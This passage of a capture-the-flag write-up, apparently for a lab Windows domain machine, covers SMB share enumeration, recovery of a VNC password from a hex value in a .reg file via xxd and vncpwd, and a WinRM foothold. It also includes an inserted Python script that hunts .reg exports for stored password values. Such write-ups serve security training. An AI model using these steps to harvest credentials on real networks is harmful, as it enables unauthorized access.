SMB
I was able to retrieve a data share with the credentials for ryan.
╰─ smbmap -H 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva'
[+] IP: 10.10.10.182:445    Name: cascade.local
    Disk        Permissions    Comment
    ----        -----------    -------
    ADMIN$      NO ACCESS      Remote Admin
    Audit$      NO ACCESS
    C$          NO ACCESS      Default share
    Data        READ ONLY
    IPC$        NO ACCESS      Remote IPC
    NETLOGON    READ ONLY      Logon server share
    print$      READ ONLY      Printer Drivers
    SYSVOL      READ ONLY      Logon server share
There was an HTML file that gave the name of an account, TempAdmin.
-- New production network will be going live on Wednesday so keep an eye out for any issues.
-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
-- The winner of the “Best GPO” competition will be announced on Friday so get your submissions in soon.
There was also a .reg file that allowed me to view a hex-encoded password for VNC.
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
We have to strip the commas, convert the hex string to raw bytes, and pass the resulting file to a tool called vncpwd.
╰─ echo '6bcf2a4b6e5aca0f' | xxd -r -p > vnc_enc_pass
╭─ /home/kali/vncpwd  master ?2  root@kali
╰─ ./vncpwd vnc_enc_pass
Password: sT333ve2
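An added example (not from the original write-up): a small Python parser that performs the comma-stripping and hex-to-bytes step for every hex-typed value in a .reg export, which also makes it usable for auditing readable shares for stored password values. Only the "Password" line comes from the page; the key path and the other sample values are constructed.

```python
import re

# Constructed sample in .reg export layout; only the "Password" line is from
# the page. The key path and the other values are made up for the example.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ExampleVNC\Server]
"RfbPort"=dword:0000170c
"ExtraPorts"=""
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"Banner"=hex:48,65,6c,6c,\
  6f,21
'''

VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=hex(?:\([0-9a-f]+\))?:(?P<data>[0-9a-fA-F,\s]*)$')

def decode_reg_text(raw: bytes) -> str:
    """regedit exports are usually UTF-16LE with a BOM; fall back to UTF-8."""
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("utf-8", errors="replace")

def hex_values(text: str):
    """Yield (key, value_name, bytes) for every hex-typed value in a .reg export."""
    key = None
    # Join continuation lines: a trailing backslash means the value continues.
    joined = re.sub(r"\\\r?\n\s*", "", text)
    for line in joined.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if m:
            yield key, m["name"], bytes.fromhex(m["data"].replace(",", ""))

def find_stored_passwords(text: str):
    """Return hex values whose name contains 'password' (case-insensitive)."""
    return [(k, n, v) for k, n, v in hex_values(text) if "password" in n.lower()]

if __name__ == "__main__":
    for key, name, blob in find_stored_passwords(SAMPLE_REG):
        print(f"{key}\\{name}: {len(blob)} bytes -> {blob.hex()}")
```

The bytes returned for "Password" are the same 8 bytes that the xxd command writes to vnc_enc_pass.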
Now we have to do the same shit again
I validated the creds with crackmapexec and was able to get a foothold on the machine with WinRM.